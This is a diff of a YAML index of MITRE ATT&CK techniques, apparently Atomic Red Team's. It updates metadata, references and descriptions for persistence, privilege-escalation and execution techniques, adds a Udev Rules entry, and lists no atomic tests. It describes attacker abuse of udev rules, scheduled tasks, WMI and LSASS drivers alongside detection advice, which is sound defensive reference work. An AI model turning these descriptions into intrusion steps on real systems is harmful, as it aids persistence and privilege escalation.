+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23767,9 +24031,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23826,8 +24089,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23836,7 +24099,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23878,7 +24140,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23903,12 +24165,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23948,8 +24209,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23957,13 +24220,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23994,17 +24257,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -24067,7 +24327,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -24101,8 +24361,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -24111,6 +24371,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24123,7 +24387,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -24226,9 +24489,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24264,7 +24585,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24288,12 +24609,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24377,11 +24697,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24433,9 +24752,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24484,7 +24802,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24522,30 +24840,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24592,7 +24909,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24624,8 +24941,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24639,6 +24956,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24651,16 +24972,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24726,7 +25050,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24803,66 +25126,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24875,31 +25143,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24957,9 +25277,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
